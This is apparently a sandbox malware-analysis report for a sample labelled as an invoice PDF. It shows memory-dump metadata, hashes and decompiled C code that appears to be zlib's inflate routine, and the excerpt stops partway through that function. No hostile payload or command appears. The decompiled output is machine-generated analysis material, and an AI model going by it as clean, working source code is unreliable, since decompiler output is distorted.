                            0x01316142
                            0x01316144
                            0x01316146
                            0x01316146
                            0x01316146
                            0x00000000
                            0x013160e0
                            0x00000000
                            0x013160e0
                            0x013160e0
                            0x013160e0
                            0x013160e2
                            0x00000000
                            0x00000000
                            0x013160e8
                            0x013160e8
                            0x013160ec
                            0x013160f3
                            0x013160f6
                            0x013160fd
                            0x01316106
                            0x0131610a
                            0x01316126
                            0x01316133
                            0x01316135
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01316135
                            0x00000000
                            0x013160e0
                            0x013160d7
                            0x01316046
                            0x01316046
                            0x01316046
                            0x01316046
                            0x01316048
                            0x00000000
                            0x00000000
                            0x0131604e
                            0x01316053
                            0x01316055
                            0x0131605e
                            0x01316061
                            0x01316065
                            0x0131606b
                            0x01316076
                            0x0131607b
                            0x01316085
                            0x01316087
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01316087
                            0x00000000
                            0x01316046
                            0x00000000
                            0x00000000
                            0x01316199
                            0x01316199
                            0x0131619c
                            0x0131619e
                            0x013161e4
                            0x013161e4
                            0x00000000
                            0x013161a0
                            0x013161a0
                            0x013161a0
                            0x013161a2
                            0x013161c9
                            0x013161ce
                            0x013161d3
                            0x013161d5
                            0x013161d7
                            0x013161da
                            0x013161da
                            0x013161da
                            0x013161e0
                            0x00000000
                            0x013161a4
                            0x013161a4
                            0x013161a4
                            0x013161a4
                            0x013161a6
                            0x00000000
                            0x00000000
                            0x013161ac
                            0x013161b1
                            0x013161b3
                            0x013161b4
                            0x013161b7
                            0x013161b9
                            0x013161bc
                            0x013161c0
                            0x013161c1
                            0x013161c5
                            0x013161c7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013161c7
                            0x00000000
                            0x013161a4
                            0x013161a2
                            0x00000000
                            0x00000000
                            0x013161eb
                            0x013161eb
                            0x013161ef
                            0x013161f1
                            0x00000000
                            0x013161f7
                            0x013161f7
                            0x013161fb
                            0x013161fd
                            0x01316200
                            0x01316202
                            0x01316253
                            0x01316257
                            0x01316257
                            0x01316259
                            0x0131625d
                            0x00000000
                            0x01316204
                            0x01316204
                            0x01316204
                            0x01316206
                            0x01316209
                            0x0131622b
                            0x0131622b
                            0x0131622e
                            0x01316230
                            0x01316243
                            0x01316243
                            0x01316232
                            0x01316232
                            0x0131623a
                            0x0131623a
                            0x01316246
                            0x0131624a
                            0x0131624d
                            0x0131624f
                            0x01316251
                            0x01316260
                            0x01316260
                            0x01316260
                            0x01316262
                            0x01316262
                            0x01316266
                            0x01316268
                            0x0131626f
                            0x01316277
                            0x0131627a
                            0x0131627e
                            0x0131627e
                            0x01316280
                            0x01316280
                            0x01316283
                            0x01316285
                            0x01316286
                            0x01316286
                            0x01316286
                            0x0131628b
                            0x0131628f
                            0x01316293
                            0x01316297
                            0x0131629a
                            0x013162a0
                            0x013162a0
                            0x01315897
                            0x01315897
                            0x0131620b
                            0x0131620b
                            0x0131620b
                            0x01316212
                            0x00000000
                            0x01316214
                            0x01316214
                            0x01316214
                            0x01316218
                            0x0131621f
                            0x0131621f
                            0x01316212
                            0x01316209
                            0x00000000
                            0x01316202
                            0x00000000
                            0x00000000
                            0x013162ac
                            0x013162ac
                            0x013162b1
                            0x00000000
                            0x013162b7
                            0x013162b7
                            0x013162b7
                            0x013162bb
                            0x013162be
                            0x013162c2
                            0x013162c6
                            0x013162c8
                            0x013162cc
                            0x00000000
                            0x013162cc
                            0x00000000
                            0x00000000
                            0x013162d8
                            0x013162d8
                            0x013162da
                            0x013162dc
                            0x013163b7
                            0x013163b7
                            0x00000000
                            0x013162e2
                            0x013162e2
                            0x013162e2
                            0x013162e5
                            0x0131630e
                            0x0131630e
                            0x01316312
                            0x01316316
                            0x01316319
                            0x0131631c
                            0x01316320
                            0x01316324
                            0x01316326
                            0x01316328
                            0x0131632a
                            0x0131632f
                            0x01316333
                            0x01316337
                            0x01316338
                            0x0131633b
                            0x01316344
                            0x0131633d
                            0x0131633d
                            0x0131633d
                            0x01316349
                            0x0131634d
                            0x01316350
                            0x01316354
                            0x01316357
                            0x01316357
                            0x01316328
                            0x0131635a
                            0x0131635e
                            0x01316362
                            0x01316366
                            0x013163af
                            0x013163af
                            0x013163b1
                            0x013163b1
                            0x013163b3
                            0x00000000
                            0x01316368
                            0x01316368
                            0x01316368
                            0x0131636c
                            0x0131636e
                            0x01316370
                            0x01316378
                            0x0131637b
                            0x0131637f
                            0x01316382
                            0x01316387
                            0x0131638a
                            0x0131638e
                            0x01316391
                            0x01316391
                            0x01316391
                            0x01316393
                            0x01316396
                            0x00000000
                            0x01316398
                            0x01316398
                            0x01316398
                            0x0131639c
                            0x013163a3
                            0x00000000
                            0x013163a3
                            0x01316396
                            0x013162e7
                            0x013162e7
                            0x013162e7
                            0x013162e7
                            0x013162e9
                            0x00000000
                            0x00000000
                            0x013162ef
                            0x013162ef
                            0x013162f2
                            0x013162f4
                            0x013162f6
                            0x013162f7
                            0x013162f9
                            0x013162fd
                            0x01316300
                            0x01316304
                            0x01316305
                            0x01316308
                            0x00000000
                            0x0131630a
                            0x0131630a
                            0x0131630a
                            0x00000000
                            0x0131630a
                            0x00000000
                            0x01316308
                            0x00000000
                            0x013162e7
                            0x013162e5
                            0x00000000
                            0x00000000
                            0x013163be
                            0x013163be
                            0x013163c2
                            0x0131643d
                            0x0131643d
                            0x00000000
                            0x013163c4
                            0x013163c4
                            0x013163c4
                            0x013163c8
                            0x00000000
                            0x013163ca
                            0x013163ca
                            0x013163ca
                            0x013163cd
                            0x013163f3
                            0x013163f3
                            0x013163f6
                            0x01316435
                            0x01316435
                            0x01316437
                            0x01316437
                            0x01316439
                            0x00000000
                            0x013163f8
                            0x013163f8
                            0x013163f8
                            0x013163fc
                            0x01316403
                            0x00000000
                            0x01316403
                            0x013163d0
                            0x00000000
                            0x013163d0
                            0x013163d0
                            0x013163d0
                            0x013163d2
                            0x00000000
                            0x00000000
                            0x013163d8
                            0x013163d8
                            0x013163db
                            0x013163dd
                            0x013163df
                            0x013163e0
                            0x013163e2
                            0x013163e6
                            0x013163e9
                            0x013163ed
                            0x013163ee
                            0x013163f1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013163f1
                            0x00000000
                            0x013163d0
                            0x013163cd
                            0x013163c8
                            0x00000000
                            0x00000000
                            0x01316444
                            0x01316444
                            0x00000000
                            0x00000000
                            0x01316451
                            0x01316451
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01314f30
                            0x013158ac
                            0x013158b8
                            0x013158b8
                            0x01315950
                            0x00000000
                            0x01315950
                            0x01315950
                            0x01315953
                            0x00000000
                            0x01315955
                            0x01315955
                            0x01315955
                            0x01315957
                            0x00000000
                            0x00000000
                            0x0131595d
                            0x01315962
                            0x01315964
                            0x01315965
                            0x01315967
                            0x0131596b
                            0x0131596e
                            0x01315972
                            0x01315976
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315976
                            0x00000000
                            0x01315955
                            0x00000000
                            0x01315978
                            0x0131597d
                            0x01315980
                            0x01315983
                            0x01315986
                            0x01315992
                            0x01315997
                            0x0131599d
                            0x00000000
                            0x01315950
                            0x0131594a
                            0x01315930
                            0x00000000
                            0x01315926

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4548ceb1eb57a780950097d580c53503c10ad55e44c5d92bff7efe1e839a3244
                            • Instruction ID: 4b1d947f0eb833285ca509b4458bc32381502175c796c33c5107c03197591d6b
                            • Opcode Fuzzy Hash: 4548ceb1eb57a780950097d580c53503c10ad55e44c5d92bff7efe1e839a3244
                            • Instruction Fuzzy Hash: 7E62CEB1A04B129FC708CF29C48066ABBF1FFC9308F444A2DE9959B785D774E819CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314E60, Relevance: .7, Instructions: 695COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E01314E60() {
				signed int _t808;
				unsigned int _t810;
				signed int _t813;
				signed char* _t857;
				signed int* _t862;
				signed int _t876;
				signed int _t886;
				signed int _t890;
				signed int _t897;
				void* _t904;

				_t862 =  *(_t904 + 4);
				if(_t862 == 0 || _t862[8] == 0 || _t862[9] == 0) {
					L376:
					return 0xfffffffe;
				} else {
					_t886 = _t862[7];
					 *(_t904 + 0x18) = _t886;
					if(_t886 == 0 ||  *_t886 != _t862) {
						goto L376;
					} else {
						_t808 =  *(_t886 + 4);
						if(_t808 < 0x3f34 || _t808 > 0x3f53 || _t862[3] == 0 ||  *_t862 == 0 && _t862[1] != 0) {
							goto L376;
						} else {
							if(_t808 == 0x3f3f) {
								 *(_t886 + 4) = 0x3f40;
							}
							_t876 =  *(_t886 + 0x3c);
							 *(_t904 + 0x14) = _t862[3];
							_t810 = _t862[4];
							 *(_t904 + 0x10) = _t810;
							 *(_t904 + 0x1c) = _t810;
							 *((intOrPtr*)(_t904 + 0x24)) = 0;
							_t897 = _t862[1];
							_t813 =  *(_t886 + 4) - 0x3f34;
							 *(_t904 + 0x10) =  *_t862;
							 *(_t904 + 0xc) = _t876;
							 *(_t904 + 0x34) = _t897;
							_t890 =  *(_t886 + 0x40);
							if(_t813 > 0x1e) {
								L192:
								return 0xfffffffe;
							} else {
								 *((intOrPtr*)(_t904 + 0x3c)) = _t886 + 0x58;
								_t857 =  *(_t904 + 0x14);
								do {
									switch( *((intOrPtr*)(_t813 * 4 +  &M01316560))) {
										case 0:
											_t815 =  *(_t886 + 0xc);
											if(_t815 != 0) {
												__eflags = _t890 - 0x10;
												if(_t890 >= 0x10) {
													L22:
													__eflags = _t815 & 0x00000002;
													if((_t815 & 0x00000002) == 0) {
														L27:
														_t816 =  *(_t886 + 0x24);
														 *(_t886 + 0x14) = 0;
														__eflags = _t816;
														if(_t816 != 0) {
															 *(_t816 + 0x30) = 0xffffffff;
														}
														__eflags =  *(_t886 + 0xc) & 0x00000001;
														if(( *(_t886 + 0xc) & 0x00000001) == 0) {
															L40:
															_t862[6] = "incorrect header check";
															 *(_t886 + 4) = 0x3f51;
														} else {
															_t820 = (_t876 >> 8) + ((_t876 & 0x000000ff) << 8);
															__eflags = _t820 % 0x1f;
															_t876 =  *(_t904 + 0x10);
															if(_t820 % 0x1f != 0) {
																_t862 =  *(_t904 + 0x48);
																goto L40;
															} else {
																__eflags = (_t876 & 0x0000000f) - 8;
																if((_t876 & 0x0000000f) == 8) {
																	_t876 = _t876 >> 4;
																	_t890 = _t890 - 4;
																	 *(_t904 + 0x10) = _t876;
																	_t868 = (_t876 & 0x0000000f) + 8;
																	__eflags =  *(_t886 + 0x28);
																	if( *(_t886 + 0x28) == 0) {
																		 *(_t886 + 0x28) = _t868;
																	}
																	__eflags = _t868 - 0xf;
																	if(_t868 > 0xf) {
																		L38:
																		_t862 =  *(_t904 + 0x48);
																		_t862[6] = "invalid window size";
																		 *(_t886 + 4) = 0x3f51;
																	} else {
																		__eflags = _t868 -  *(_t886 + 0x28);
																		if(_t868 >  *(_t886 + 0x28)) {
																			goto L38;
																		} else {
																			_push(0);
																			_push(0);
																			_push(0);
																			 *(_t886 + 0x18) = 1 << _t868;
																			_t826 = L01316A20();
																			_t881 =  *(_t904 + 0x1c);
																			_t904 = _t904 + 0xc;
																			_t862 =  *(_t904 + 0x48);
																			 *(_t886 + 0x1c) = _t826;
																			_t862[0xc] = _t826;
																			 *(_t886 + 4) =  !(_t881 >> 8) & 0x00000002 | 0x00003f3d;
																			_t876 = 0;
																			 *(_t904 + 0x10) = 0;
																			_t890 = 0;
																		}
																	}
																} else {
																	_t862 =  *(_t904 + 0x48);
																	_t862[6] = "unknown compression method";
																	 *(_t886 + 4) = 0x3f51;
																}
															}
														}
													} else {
														__eflags = _t876 - 0x8b1f;
														if(_t876 != 0x8b1f) {
															goto L27;
														} else {
															__eflags =  *(_t886 + 0x28);
															if( *(_t886 + 0x28) == 0) {
																 *(_t886 + 0x28) = 0xf;
															}
															_push(0);
															_push(0);
															_push(0);
															 *(_t886 + 0x1c) = E01316CA0();
															_push(2);
															_push(_t904 + 0x24);
															 *(_t904 + 0x2c) = 0x8b1f;
															_push( *(_t886 + 0x1c));
															_t829 = E01316CA0();
															_t876 = 0;
															 *(_t886 + 0x1c) = _t829;
															_t904 = _t904 + 0x18;
															 *(_t904 + 0x10) = 0;
															_t890 = 0;
															 *(_t886 + 4) = 0x3f35;
															goto L190;
														}
													}
													goto L191;
												} else {
													while(1) {
														__eflags = _t897;
														if(_t897 == 0) {
															goto L115;
														}
														_t852 = ( *_t857 & 0x000000ff) << _t890;
														_t857 =  &(_t857[1]);
														_t876 = _t876 + _t852;
														 *(_t904 + 0x14) = _t857;
														_t890 = _t890 + 8;
														 *(_t904 + 0x10) = _t876;
														_t897 = _t897 - 1;
														__eflags = _t890 - 0x10;
														if(_t890 < 0x10) {
															continue;
														} else {
															_t815 =  *(_t886 + 0xc);
															_t862 =  *(_t904 + 0x48);
															goto L22;
														}
														goto L377;
													}
													goto L115;
												}
											} else {
												 *(_t886 + 4) = 0x3f40;
												goto L191;
											}
											goto L377;
										case 1:
											__eflags = __esi - 0x10;
											if(__esi >= 0x10) {
												L46:
												 *(__edi + 0x14) = __edx;
												__eflags = __dl - 8;
												if(__dl == 8) {
													__eflags = __edx & 0x0000e000;
													if((__edx & 0x0000e000) == 0) {
														__ecx =  *(__edi + 0x24);
														__eflags = __ecx;
														if(__ecx != 0) {
															__edx = __edx >> 8;
															__eax = __edx >> 0x00000008 & 0x00000001;
															__eflags = __eax;
															 *__ecx = __eax;
														}
														__eflags =  *(__edi + 0x14) & 0x00000200;
														if(( *(__edi + 0x14) & 0x00000200) != 0) {
															__eflags =  *(__edi + 0xc) & 0x00000004;
															if(( *(__edi + 0xc) & 0x00000004) != 0) {
																 *(__esp + 0x18) = __dl;
																__eax = __esp + 0x18;
																_push(2);
																__eflags = __edx;
																_push(__eax);
																 *(__esp + 0x21) = __dl;
																_push( *(__edi + 0x1c));
																__eax = E01316CA0();
																__esp = __esp + 0xc;
																 *(__edi + 0x1c) = __eax;
															}
														}
														__edx = 0;
														 *(__edi + 4) = 0x3f36;
														 *(__esp + 0x10) = 0;
														__esi = 0;
														goto L57;
													} else {
														 *(__ecx + 0x18) = "unknown header flags set";
														 *(__edi + 4) = 0x3f51;
														goto L191;
													}
												} else {
													 *(__ecx + 0x18) = "unknown compression method";
													 *(__edi + 4) = 0x3f51;
													goto L191;
												}
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L115;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x10;
													if(__esi < 0x10) {
														continue;
													} else {
														__ecx =  *(__esp + 0x48);
														goto L46;
													}
													goto L377;
												}
												goto L115;
											}
											goto L377;
										case 2:
											__eflags = __esi - 0x20;
											if(__esi >= 0x20) {
												L59:
												__eax =  *(__edi + 0x24);
												__eflags = __eax;
												if(__eax != 0) {
													 *(__eax + 4) = __edx;
												}
												__eflags =  *(__edi + 0x14) & 0x00000200;
												if(( *(__edi + 0x14) & 0x00000200) != 0) {
													__eflags =  *(__edi + 0xc) & 0x00000004;
													if(( *(__edi + 0xc) & 0x00000004) != 0) {
														__eax = __edx;
														 *(__esp + 0x18) = __dl;
														__eax = __edx >> 8;
														 *(__esp + 0x19) = __al;
														__edx = __edx >> 0x10;
														 *(__esp + 0x1a) = __al;
														__eax = __esp + 0x18;
														_push(4);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x23) = __dl;
														_push( *(__edi + 0x1c));
														__eax = E01316CA0();
														__esp = __esp + 0xc;
														 *(__edi + 0x1c) = __eax;
													}
												}
												__edx = 0;
												 *(__edi + 4) = 0x3f37;
												 *(__esp + 0x10) = 0;
												__esi = 0;
												goto L66;
											} else {
												while(1) {
													L57:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L115;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x20;
													if(__esi < 0x20) {
														continue;
													} else {
														goto L59;
													}
													goto L377;
												}
												goto L115;
											}
											goto L377;
										case 3:
											__eflags = __esi - 0x10;
											if(__esi >= 0x10) {
												L68:
												__ecx =  *(__edi + 0x24);
												__eflags = __ecx;
												if(__ecx != 0) {
													__eax = __dl & 0x000000ff;
													 *(__ecx + 8) = __dl & 0x000000ff;
													__ecx = __edx;
													__eax =  *(__edi + 0x24);
													__ecx = __edx >> 8;
													__eflags = __ecx;
													 *( *(__edi + 0x24) + 0xc) = __ecx;
												}
												__eflags =  *(__edi + 0x14) & 0x00000200;
												if(( *(__edi + 0x14) & 0x00000200) != 0) {
													__eflags =  *(__edi + 0xc) & 0x00000004;
													if(( *(__edi + 0xc) & 0x00000004) != 0) {
														 *(__esp + 0x18) = __dl;
														__eax = __esp + 0x18;
														_push(2);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x21) = __dl;
														_push( *(__edi + 0x1c));
														__eax = E01316CA0();
														__esp = __esp + 0xc;
														 *(__edi + 0x1c) = __eax;
													}
												}
												__edx = 0;
												 *(__edi + 4) = 0x3f38;
												 *(__esp + 0x10) = 0;
												__esi = 0;
												__eflags = 0;
												goto L74;
											} else {
												while(1) {
													L66:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L115;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x10;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L68;
													}
													goto L377;
												}
												goto L115;
											}
											goto L377;
										case 4:
											L74:
											__eflags =  *(__edi + 0x14) & 0x00000400;
											if(( *(__edi + 0x14) & 0x00000400) == 0) {
												__eax =  *(__edi + 0x24);
												__eflags = __eax;
												if(__eax != 0) {
													 *(__eax + 0x10) = 0;
												}
												goto L87;
											} else {
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L79:
													__eax =  *(__edi + 0x24);
													 *(__edi + 0x44) = __edx;
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x14) = __edx;
													}
													__eflags =  *(__edi + 0x14) & 0x00000200;
													if(( *(__edi + 0x14) & 0x00000200) != 0) {
														__eflags =  *(__edi + 0xc) & 0x00000004;
														if(( *(__edi + 0xc) & 0x00000004) != 0) {
															 *(__esp + 0x18) = __dl;
															__eax = __esp + 0x18;
															_push(2);
															__eflags = __edx;
															_push(__eax);
															 *(__esp + 0x21) = __dl;
															_push( *(__edi + 0x1c));
															__eax = E01316CA0();
															__esp = __esp + 0xc;
															 *(__edi + 0x1c) = __eax;
														}
													}
													__ecx = 0;
													__esi = 0;
													 *(__esp + 0x10) = 0;
													L87:
													 *(__edi + 4) = 0x3f39;
													goto L88;
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L115;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
															goto L79;
														}
														goto L377;
													}
													goto L115;
												}
											}
											goto L377;
										case 5:
											L88:
											__eflags =  *(__edi + 0x14) & 0x00000400;
											if(( *(__edi + 0x14) & 0x00000400) == 0) {
												L101:
												 *(__edi + 0x44) = 0;
												 *(__edi + 4) = 0x3f3a;
												goto L102;
											} else {
												__ecx =  *(__edi + 0x44);
												__eflags = __ecx - __ebp;
												__ecx =  >  ? __ebp : __ecx;
												 *(__esp + 0x30) = __ecx;
												__eflags = __ecx;
												if(__ecx != 0) {
													__edx =  *(__edi + 0x24);
													__eflags = __edx;
													if(__edx != 0) {
														__eax =  *(__edx + 0x10);
														 *(__esp + 0x14) = __eax;
														__eflags = __eax;
														if(__eax != 0) {
															__eax =  *(__edx + 0x14);
															__eax =  *(__edx + 0x14) -  *(__edi + 0x44);
															__edx =  *(__edx + 0x18);
															 *(__esp + 0x34) = __eax;
															__eflags = __eax - __edx;
															__eax =  *(__esp + 0x34);
															if(__eflags <= 0) {
																__edx = __ecx;
															} else {
																__edx = __edx - __eax;
															}
															__eflags = __eax;
															__eax = E013189A0(__eax, __ebx, __edx);
															__ecx =  *(__esp + 0x3c);
														}
													}
													__eflags =  *(__edi + 0x14) & 0x00000200;
													if(( *(__edi + 0x14) & 0x00000200) != 0) {
														__eflags =  *(__edi + 0xc) & 0x00000004;
														if(( *(__edi + 0xc) & 0x00000004) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push( *(__edi + 0x1c));
															__eax = E01316CA0();
															__esp = __esp + 0xc;
															 *(__edi + 0x1c) = __eax;
														}
													}
													__eax =  *(__esp + 0x30);
													__ebx = __ebx + __eax;
													__ebp = __ebp - __eax;
													 *(__esp + 0x14) = __ebx;
													_t186 = __edi + 0x44;
													 *_t186 =  *(__edi + 0x44) - __eax;
													__eflags =  *_t186;
												}
												__eflags =  *(__edi + 0x44);
												if( *(__edi + 0x44) != 0) {
													goto L115;
												} else {
													goto L101;
												}
											}
											goto L377;
										case 6:
											L102:
											__eflags =  *(__edi + 0x14) & 0x00000800;
											if(( *(__edi + 0x14) & 0x00000800) == 0) {
												__eax =  *(__edi + 0x24);
												__eflags = __eax;
												if(__eax != 0) {
													 *(__eax + 0x1c) = 0;
												}
												goto L127;
											} else {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L115;
												} else {
													__ecx = 0;
													__eflags = 0;
													while(1) {
														__eax =  *(__ecx + __ebx) & 0x000000ff;
														__ecx = __ecx + 1;
														 *(__esp + 0x30) = __eax;
														__eax =  *(__edi + 0x24);
														__eflags = __eax;
														if(__eax != 0) {
															__edx =  *(__eax + 0x1c);
															__eflags =  *(__eax + 0x1c);
															if( *(__eax + 0x1c) != 0) {
																__edx =  *(__edi + 0x44);
																__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
																if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
																	__eax =  *(__eax + 0x1c);
																	__ebx =  *(__esp + 0x30);
																	 *(__eax + __edx) = __bl;
																	_t203 = __edi + 0x44;
																	 *_t203 =  *(__edi + 0x44) + 1;
																	__eflags =  *_t203;
																	__ebx =  *(__esp + 0x14);
																}
															}
														}
														__eax =  *(__esp + 0x30);
														__eflags = __eax;
														if(__eax == 0) {
															break;
														}
														__eflags = __ecx - __ebp;
														if(__ecx < __ebp) {
															continue;
														}
														break;
													}
													__eflags =  *(__edi + 0x14) & 0x00000200;
													 *(__esp + 0x34) = __ecx;
													if(( *(__edi + 0x14) & 0x00000200) != 0) {
														__eflags =  *(__edi + 0xc) & 0x00000004;
														if(( *(__edi + 0xc) & 0x00000004) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push( *(__edi + 0x1c));
															__eax = E01316CA0();
															__ecx =  *(__esp + 0x40);
															__esp = __esp + 0xc;
															 *(__edi + 0x1c) = __eax;
															__eax =  *(__esp + 0x30);
														}
													}
													__ebx = __ebx + __ecx;
													__ebp = __ebp - __ecx;
													 *(__esp + 0x14) = __ebx;
													__eflags = __eax;
													if(__eax == 0) {
														L127:
														 *(__edi + 0x44) = 0;
														 *(__edi + 4) = 0x3f3b;
														goto L128;
													} else {
														goto L115;
													}
												}
											}
											goto L377;
										case 7:
											L128:
											__eflags =  *(__edi + 0x14) & 0x00001000;
											if(( *(__edi + 0x14) & 0x00001000) == 0) {
												__eax =  *(__edi + 0x24);
												__eflags = __eax;
												if(__eax != 0) {
													 *(__eax + 0x24) = 0;
												}
												goto L144;
											} else {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L115;
												} else {
													__ecx = 0;
													__eflags = 0;
													while(1) {
														__eax =  *(__ecx + __ebx) & 0x000000ff;
														__ecx = __ecx + 1;
														 *(__esp + 0x30) = __eax;
														__eax =  *(__edi + 0x24);
														__eflags = __eax;
														if(__eax != 0) {
															__edx =  *(__eax + 0x24);
															__eflags =  *(__eax + 0x24);
															if( *(__eax + 0x24) != 0) {
																__edx =  *(__edi + 0x44);
																__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
																if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
																	__eax =  *(__eax + 0x24);
																	__ebx =  *(__esp + 0x30);
																	 *(__eax + __edx) = __bl;
																	_t254 = __edi + 0x44;
																	 *_t254 =  *(__edi + 0x44) + 1;
																	__eflags =  *_t254;
																	__ebx =  *(__esp + 0x14);
																}
															}
														}
														__eax =  *(__esp + 0x30);
														__eflags = __eax;
														if(__eax == 0) {
															break;
														}
														__eflags = __ecx - __ebp;
														if(__ecx < __ebp) {
															continue;
														}
														break;
													}
													__eflags =  *(__edi + 0x14) & 0x00000200;
													 *(__esp + 0x34) = __ecx;
													if(( *(__edi + 0x14) & 0x00000200) != 0) {
														__eflags =  *(__edi + 0xc) & 0x00000004;
														if(( *(__edi + 0xc) & 0x00000004) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push( *(__edi + 0x1c));
															__eax = E01316CA0();
															__ecx =  *(__esp + 0x40);
															__esp = __esp + 0xc;
															 *(__edi + 0x1c) = __eax;
															__eax =  *(__esp + 0x30);
														}
													}
													__ebx = __ebx + __ecx;
													__ebp = __ebp - __ecx;
													 *(__esp + 0x14) = __ebx;
													__eflags = __eax;
													if(__eax != 0) {
														goto L115;
													} else {
														L144:
														__edx =  *(__esp + 0x10);
														 *(__edi + 4) = 0x3f3c;
														goto L145;
													}
												}
											}
											goto L377;
										case 8:
											L145:
											__eflags =  *(__edi + 0x14) & 0x00000200;
											if(( *(__edi + 0x14) & 0x00000200) == 0) {
												L153:
												__ecx =  *(__edi + 0x24);
												__eflags = __ecx;
												if(__ecx != 0) {
													 *(__edi + 0x14) =  *(__edi + 0x14) >> 9;
													__eax =  *(__edi + 0x14) >> 0x00000009 & 0x00000001;
													__eflags = __eax;
													 *(__ecx + 0x2c) = __eax;
													__eax =  *(__edi + 0x24);
													 *( *(__edi + 0x24) + 0x30) = 1;
												}
												_push(0);
												_push(0);
												_push(0);
												__eax = E01316CA0();
												__ecx =  *(__esp + 0x54);
												__esp = __esp + 0xc;
												__edx =  *(__esp + 0x10);
												 *(__edi + 0x1c) = __eax;
												 *(__ecx + 0x30) = __eax;
												 *(__edi + 4) = 0x3f3f;
												goto L191;
											} else {
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L149:
													__eflags =  *(__edi + 0xc) & 0x00000004;
													if(( *(__edi + 0xc) & 0x00000004) == 0) {
														L152:
														__ecx = 0;
														__esi = 0;
														__eflags = 0;
														 *(__esp + 0x10) = 0;
														goto L153;
													} else {
														__eax =  *(__edi + 0x1c) & 0x0000ffff;
														__eflags = __edx - ( *(__edi + 0x1c) & 0x0000ffff);
														if(__edx == ( *(__edi + 0x1c) & 0x0000ffff)) {
															goto L152;
														} else {
															__ecx =  *(__esp + 0x48);
															 *(__ecx + 0x18) = "header crc mismatch";
															 *(__edi + 4) = 0x3f51;
														}
													}
													goto L191;
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L115;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
															goto L149;
														}
														goto L377;
													}
													goto L115;
												}
											}
											goto L377;
										case 9:
											__eflags = __esi - 0x20;
											if(__esi >= 0x20) {
												L160:
												__ecx = __edx;
												__edx = __edx << 0x10;
												__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
												__edx = __edx >> 8;
												__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
												__eax = __edx >> 0x00000008 & 0x0000ff00;
												__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
												__edx = __edx >> 0x18;
												__ecx =  *(__esp + 0x48);
												__eax = __eax + __edx;
												__edx = 0;
